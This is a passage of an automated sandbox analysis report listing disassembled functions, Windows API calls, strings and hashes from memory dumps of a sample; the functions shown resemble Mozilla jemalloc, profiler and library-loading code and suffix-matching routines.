AcquireSRWLockExclusive.KERNEL32(6D5CE804), ref: 6D57D047
GetSystemInfo.KERNEL32(?), ref: 6D57D093
__Init_thread_footer.LIBCMT ref: 6D57D0A6
GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6D5CE810,00000040), ref: 6D57D0D0
InitializeCriticalSectionAndSpinCount.KERNEL32(6D5CE7B8,00001388), ref: 6D57D147
InitializeCriticalSectionAndSpinCount.KERNEL32(6D5CE744,00001388), ref: 6D57D162
InitializeCriticalSectionAndSpinCount.KERNEL32(6D5CE784,00001388), ref: 6D57D18D
InitializeCriticalSectionAndSpinCount.KERNEL32(6D5CE7DC,00001388), ref: 6D57D1B1

Strings

MALLOC_OPTIONS, xrefs: 6D57D0CB
: (malloc) Unsupported character in malloc options: ', xrefs: 6D57D322
<jemalloc>, xrefs: 6D57D268, 6D57D311
MOZ_CRASH(), xrefs: 6D57D277
Compile-time page size does not divide the runtime one., xrefs: 6D57D26D

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
API String ID: 2957312145-326518326
Opcode ID: 3fb12abb5678f331b98220d334af902140ec938ab0d90311cb953ab54fcdbbbf
Instruction ID: 6227722703a1fa44a8b72904757c25c96d0ea901ff8d7f14197b95e2df3045fa
Opcode Fuzzy Hash: 3fb12abb5678f331b98220d334af902140ec938ab0d90311cb953ab54fcdbbbf
Instruction Fuzzy Hash: 6381F570A04641DBEF289FA8C856B7937F4FB86700F22442EE901D7F40DB759801CB92

Function 6D554180 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 180libraryloaderCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6D5541F1
VerSetConditionMask.NTDLL ref: 6D554223
VerSetConditionMask.NTDLL ref: 6D55422A
VerSetConditionMask.NTDLL ref: 6D554231
VerSetConditionMask.NTDLL ref: 6D554238
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6D554245
LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6D554263
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6D55427A
FreeLibrary.KERNEL32(?), ref: 6D554299
memset.VCRUNTIME140(?,00000000,00000114), ref: 6D5542C4
VerSetConditionMask.NTDLL ref: 6D5542F6
VerSetConditionMask.NTDLL ref: 6D554302
VerSetConditionMask.NTDLL ref: 6D554309
VerSetConditionMask.NTDLL ref: 6D554310
VerSetConditionMask.NTDLL ref: 6D554317
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6D554324

Strings

Shcore.dll, xrefs: 6D55425E
SetProcessDpiAwareness, xrefs: 6D554274

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressFreeLoadProc
String ID: SetProcessDpiAwareness$Shcore.dll
API String ID: 1275974445-999387375
Opcode ID: f41556ccaac967e0d4dd8dbeebac9b33a7d351e5991eba97c2c9c9c93b5c1812
Instruction ID: 2de351b5e340abae3b1a7333190039a3ee60b94d643ed4616045dfc141eb82c5
Opcode Fuzzy Hash: f41556ccaac967e0d4dd8dbeebac9b33a7d351e5991eba97c2c9c9c93b5c1812
Instruction Fuzzy Hash: 85512571A002256BEF196B748C09BBE737CEF89750F02451DF901979C0DB749DA0CBA1

Function 61E0FD8A Relevance: 30.3, APIs: 13, Strings: 7, Instructions: 320COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E0FDAF
memcmp.MSVCRT ref: 61E0FE00
memcmp.MSVCRT ref: 61E10580

Strings

ize, xrefs: 61E1065C
iti, xrefs: 61E105FC
ance, xrefs: 61E103AD
ate, xrefs: 61E105D5
ive, xrefs: 61E1063A
ous, xrefs: 61E10618
ence, xrefs: 61E103D4

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: memcmp
String ID: ance$ate$ence$iti$ive$ize$ous
API String ID: 1475443563-1713922985
Opcode ID: 9706f2438f5f9958a9f504a1a89414024658d7dc0fe24dd8d85b57cc53bebf8a
Instruction ID: 14175bb5b9193900e4a9b0b479f9e4e43aad601f0e58a5cb96228bda6cff1173
Opcode Fuzzy Hash: 9706f2438f5f9958a9f504a1a89414024658d7dc0fe24dd8d85b57cc53bebf8a
Instruction Fuzzy Hash: D0D127B0E09306CBDB01DF94C58269EBBF4AF85348F31C81AD8909B354D779D9668B92

Function 6D58EE40 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6D554A68), ref: 6D58945E
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6D589470
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6D589482
Part of subcall function 6D589420: __Init_thread_footer.LIBCMT ref: 6D58949F

GetCurrentThreadId.KERNEL32 ref: 6D58EE60
AcquireSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58EE6D
ReleaseSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58EE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6D58EEA5
CloseHandle.KERNEL32(?), ref: 6D58EEB4
GetCurrentThreadId.KERNEL32 ref: 6D58EEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6D58EECF

Part of subcall function 6D58DE60: GetCurrentThreadId.KERNEL32 ref: 6D58DE73
Part of subcall function 6D58DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6D554A68), ref: 6D58DE7B

Part of subcall function 6D57CBE8: GetCurrentProcess.KERNEL32(?,6D5431A7), ref: 6D57CBF1
Part of subcall function 6D57CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6D5431A7), ref: 6D57CBFA

GetCurrentThreadId.KERNEL32 ref: 6D58EF1E
AcquireSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58EF2B
ReleaseSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58EF59
GetCurrentThreadId.KERNEL32 ref: 6D58EFB0
AcquireSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58EFBD
ReleaseSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58EFE1
GetCurrentThreadId.KERNEL32 ref: 6D58EFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6D58F000

Part of subcall function 6D5894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6D5894EE
Part of subcall function 6D5894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6D589508

Strings

[I %d/%d] profiler_pause, xrefs: 6D58F008
[I %d/%d] profiler_stop, xrefs: 6D58EED7

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Current$ExclusiveLockThread$AcquireRelease_getpidgetenv$Process$CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 1586556228-1833026159
Opcode ID: f5aa78fbb6f664796f7738cc14dbbafdc2a7343f7f819f44c728aee82f3af2c9
Instruction ID: 75049abb37ebcece16456821be0536f3919c3d7df1d55332836f582deca40b12
Opcode Fuzzy Hash: f5aa78fbb6f664796f7738cc14dbbafdc2a7343f7f819f44c728aee82f3af2c9
Instruction Fuzzy Hash: FD51F535405A219FDF08ABA4D44877577B8EB86319F12051DEE15C3F42DB764840CBA3

Function 61E0FFDF Relevance: 28.8, APIs: 12, Strings: 7, Instructions: 293COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E10004
memcmp.MSVCRT ref: 61E10036
memcmp.MSVCRT ref: 61E1006E
memcmp.MSVCRT ref: 61E101F8
memcmp.MSVCRT ref: 61E103BB
memcmp.MSVCRT ref: 61E10580
memcmp.MSVCRT ref: 61E10669
memcmp.MSVCRT ref: 61E1070B

Strings

ize, xrefs: 61E1065C
iti, xrefs: 61E105FC
ance, xrefs: 61E103AD
ate, xrefs: 61E105D5
ive, xrefs: 61E1063A
ous, xrefs: 61E10618
ence, xrefs: 61E103D4

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: memcmp
String ID: ance$ate$ence$iti$ive$ize$ous
API String ID: 1475443563-1713922985
Opcode ID: b669a7a1187de0fce9b6595f66bcea219431e2422beeabc80f0d4f1047ca061f
Instruction ID: 8af95de5a1172c954fa437990dc91da2b279e7fac1ed370a937824a3edc9c215
Opcode Fuzzy Hash: b669a7a1187de0fce9b6595f66bcea219431e2422beeabc80f0d4f1047ca061f
Instruction Fuzzy Hash: EFC137B0E0C3068BDB009F94C58269EBBF4AF85348F31C81EE894DB754D779D5A68B52

Function 61E0FEFD Relevance: 27.3, APIs: 11, Strings: 7, Instructions: 287COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E0FF1E
memcmp.MSVCRT ref: 61E0FF6B
memcmp.MSVCRT ref: 61E0FFB2
memcmp.MSVCRT ref: 61E10580

Strings

ize, xrefs: 61E1065C
iti, xrefs: 61E105FC
ance, xrefs: 61E103AD
ate, xrefs: 61E105D5
ive, xrefs: 61E1063A
ous, xrefs: 61E10618
ence, xrefs: 61E103D4

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: memcmp
String ID: ance$ate$ence$iti$ive$ize$ous
API String ID: 1475443563-1713922985
Opcode ID: ed99b8ed2c93518955057c8a185e88c665ba01599eeeff3c7ab09e33224a8f47
Instruction ID: 3235e3b978ee00cfabdc0942405c464718558a8f08fb1430455de202698b3b76
Opcode Fuzzy Hash: ed99b8ed2c93518955057c8a185e88c665ba01599eeeff3c7ab09e33224a8f47
Instruction Fuzzy Hash: 1EC127B0D083068BDB00DF94C58269EBBF4AF85348F31C81ED890DB754D779D9A68B92

Function 61E100D7 Relevance: 27.3, APIs: 11, Strings: 7, Instructions: 280COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E100FC
memcmp.MSVCRT ref: 61E10131
memcmp.MSVCRT ref: 61E10580

Strings

ize, xrefs: 61E1065C
iti, xrefs: 61E105FC
ance, xrefs: 61E103AD
ate, xrefs: 61E105D5
ive, xrefs: 61E1063A
ous, xrefs: 61E10618
ence, xrefs: 61E103D4

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: memcmp
String ID: ance$ate$ence$iti$ive$ize$ous
API String ID: 1475443563-1713922985
Opcode ID: 5306eb8679e29c7ccae58c152c61b3cb2e43ab0ad82d1b8259ffa351aff7fd54
Instruction ID: a6745917a23cee73da34d97950539bfd860ce037a133a9b2c34405b562b65f13
Opcode Fuzzy Hash: 5306eb8679e29c7ccae58c152c61b3cb2e43ab0ad82d1b8259ffa351aff7fd54
Instruction Fuzzy Hash: 90C127B0E083068BDB00DF94C58669EBBF4AF85348F31C81ED890DB754D779D5A68B92

Function 6D58F6E0 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6D554A68), ref: 6D58945E
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6D589470
Part of subcall function 6D589420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6D589482
Part of subcall function 6D589420: __Init_thread_footer.LIBCMT ref: 6D58949F

GetCurrentThreadId.KERNEL32 ref: 6D58F70E
ReleaseSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58F93A

Part of subcall function 6D555E60: GetCurrentThreadId.KERNEL32 ref: 6D555EAB
Part of subcall function 6D555E60: GetCurrentThreadId.KERNEL32 ref: 6D555EB8
Part of subcall function 6D555E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6D555ECF
Part of subcall function 6D555E60: GetCurrentProcess.KERNEL32 ref: 6D555F53
Part of subcall function 6D555E60: GetCurrentThread.KERNEL32 ref: 6D555F5C
Part of subcall function 6D555E60: GetCurrentProcess.KERNEL32 ref: 6D555F66
Part of subcall function 6D555E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6D555F7E

GetCurrentThreadId.KERNEL32 ref: 6D58F98A
GetCurrentThreadId.KERNEL32 ref: 6D58F990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6D58F994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6D58F716

Part of subcall function 6D5894D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6D5894EE
Part of subcall function 6D5894D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6D589508

Part of subcall function 6D54B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6D54B5E0

Part of subcall function 6D556390: GetCurrentThreadId.KERNEL32 ref: 6D5563D0
Part of subcall function 6D556390: AcquireSRWLockExclusive.KERNEL32 ref: 6D5563DF
Part of subcall function 6D556390: ReleaseSRWLockExclusive.KERNEL32 ref: 6D55640E

GetCurrentThreadId.KERNEL32 ref: 6D58F739
AcquireSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58F746
GetCurrentThreadId.KERNEL32 ref: 6D58F793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6D5C385B,00000002,?,?,?,?,?), ref: 6D58F829
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6D58F866

Strings

[D %d/%d] profiler_register_thread(%s), xrefs: 6D58F71F
Thread , xrefs: 6D58F789
" attempted to re-register as ", xrefs: 6D58F858
[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6D58F9A6

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Current$Thread$ExclusiveLock$getenvstrlen$AcquireProcessRelease_getpid$DuplicateHandleInit_thread_footer__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 1755249923-1834255612
Opcode ID: 62cc5f779d69e9af064abb249ca439a2422a15e3cdab0731d99405085656bd21
Instruction ID: fb4923c3e2cb752ef8d61a97e4dce53527f413dbc6cfb8305fa6b4f41b8e4ec8
Opcode Fuzzy Hash: 62cc5f779d69e9af064abb249ca439a2422a15e3cdab0731d99405085656bd21
Instruction Fuzzy Hash: A58122719046149FDB18EF64C880B7EB7A5FFC9304F42846DE9499BA12EB309C45CBA3

Function 61E0FBCF Relevance: 25.8, APIs: 10, Strings: 7, Instructions: 268COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E0FBF0
memcmp.MSVCRT ref: 61E0FC37
memcmp.MSVCRT ref: 61E10580

Strings

ize, xrefs: 61E1065C
iti, xrefs: 61E105FC
ance, xrefs: 61E103AD
ate, xrefs: 61E105D5
ive, xrefs: 61E1063A
ous, xrefs: 61E10618
ence, xrefs: 61E103D4

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: memcmp
String ID: ance$ate$ence$iti$ive$ize$ous
API String ID: 1475443563-1713922985
Opcode ID: e540365b7fd7f9443dd82ee147f8b9093e47f334e53584792075e5945152a348
Instruction ID: 60f9232e79ba8c46656df14b30f4429a15bc78d1e5e1648a3d40d26d176db9d4
Opcode Fuzzy Hash: e540365b7fd7f9443dd82ee147f8b9093e47f334e53584792075e5945152a348
Instruction Fuzzy Hash: 6EB128B0D0D3068BDB00CF94C58669EBBF4AF85348F31C81AD890DB754D779D9A68B92

Function 61E0FC61 Relevance: 25.8, APIs: 10, Strings: 7, Instructions: 259COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E0FC86
memcmp.MSVCRT ref: 61E0FCBF
memcmp.MSVCRT ref: 61E10580

Strings

ize, xrefs: 61E1065C
iti, xrefs: 61E105FC
ance, xrefs: 61E103AD
ate, xrefs: 61E105D5
ive, xrefs: 61E1063A
ous, xrefs: 61E10618
ence, xrefs: 61E103D4

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: memcmp
String ID: ance$ate$ence$iti$ive$ize$ous
API String ID: 1475443563-1713922985
Opcode ID: 0a817a664abe7669e1f9b819d607d3cf4ee08d2d7d4e2fd3f7bc486b0ed951a3
Instruction ID: 2b4bda0a5a7416114e6a254efe1c2f62446bd14a06bd16ad799116575b7de764
Opcode Fuzzy Hash: 0a817a664abe7669e1f9b819d607d3cf4ee08d2d7d4e2fd3f7bc486b0ed951a3
Instruction Fuzzy Hash: 03B126B0D0C3068BDB00DF94C58269EBBF4AF85348F31C81AD890DB754D779D9A68B92

Function 6D559590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6D5431C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6D543217
Part of subcall function 6D5431C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6D543236
Part of subcall function 6D5431C0: FreeLibrary.KERNEL32 ref: 6D54324B
Part of subcall function 6D5431C0: __Init_thread_footer.LIBCMT ref: 6D543260

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6D559675
__Init_thread_footer.LIBCMT ref: 6D559697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6D5596E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6D559707
__Init_thread_footer.LIBCMT ref: 6D55971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6D559773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6D5597B7
FreeLibrary.KERNEL32 ref: 6D5597D0
FreeLibrary.KERNEL32 ref: 6D5597EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6D559824

Strings

NtMapViewOfSection, xrefs: 6D559701
ntdll.dll, xrefs: 6D5596E3
MapViewOfFileNuma2, xrefs: 6D5597B1
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6D559670

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc$ErrorLast
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 442587801-3880535382
Opcode ID: 35e4ed0016ebee0238d780396c5f1744be0aaf05f9ffca8066a0c776888de77f
Instruction ID: 3adaf12b9440ff76d8bfc207f98112fdeeea8d3a6c7fb3694185fc37c79d6bcb
Opcode Fuzzy Hash: 35e4ed0016ebee0238d780396c5f1744be0aaf05f9ffca8066a0c776888de77f
Instruction Fuzzy Hash: CA61E9B16056069BDF09DF64D884B6A7BF0FB4A310F02851EE91A97E40DB34E864CF92

Function 61E0FD37 Relevance: 24.2, APIs: 9, Strings: 7, Instructions: 248COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E0FD5C
memcmp.MSVCRT ref: 61E101F8
memcmp.MSVCRT ref: 61E103BB
memcmp.MSVCRT ref: 61E10580
memcmp.MSVCRT ref: 61E10669
memcmp.MSVCRT ref: 61E1070B

Strings

ize, xrefs: 61E1065C
iti, xrefs: 61E105FC
ance, xrefs: 61E103AD
ate, xrefs: 61E105D5
ive, xrefs: 61E1063A
ous, xrefs: 61E10618
ence, xrefs: 61E103D4

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

